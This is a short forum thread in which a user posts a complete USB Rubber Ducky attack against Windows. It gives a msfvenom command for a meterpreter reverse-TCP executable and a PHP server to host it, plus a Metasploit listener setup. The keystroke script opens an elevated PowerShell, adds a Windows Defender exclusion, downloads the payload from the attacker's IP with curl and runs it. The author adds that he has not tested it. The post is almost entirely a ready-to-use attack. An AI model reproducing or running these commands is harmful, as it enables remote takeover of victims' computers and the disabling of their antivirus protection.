Phosgene Posted June 3, 2020 Share Posted June 3, 2020 So this is a usb rubber ducky attacking in roughly .9 to 2.3 seconds NOTE: THIS REQUIRES PORT FORWARDING ( to use your ip address public ip) ports that need to be port forwarded 8888 & 8080 Heres the setup proc: (I use parrot sec os) Create the payload cd ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe Start the PHP server sudo php -S 0.0.0.0:8080 -t ~ Start your listener msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <your public ip> set LPORT 8888 set ExitOnSession false exploit -j -z Heres The Ducky Script DELAY 350 GUI r DELAY 100 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 150 ALT y STRING powershell Add-MpPreference -ExclusionPath "C:\users" ENTER DELAY 100 STRING curl -o "C:\users\exploit.exe" "http://< your public ip>:8080/exploit.exe" ENTER DELAY 100 STRING start C:\users\exploit.exe ENTER DELAY 100 STRING exit ENTER and done! Quote Link to comment Share on other sites More sharing options...
Phosgene Posted June 3, 2020 Author Share Posted June 3, 2020 Also I havent tested this I dont have a usb rubber duck or any hak5 gear so you guys can test it! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.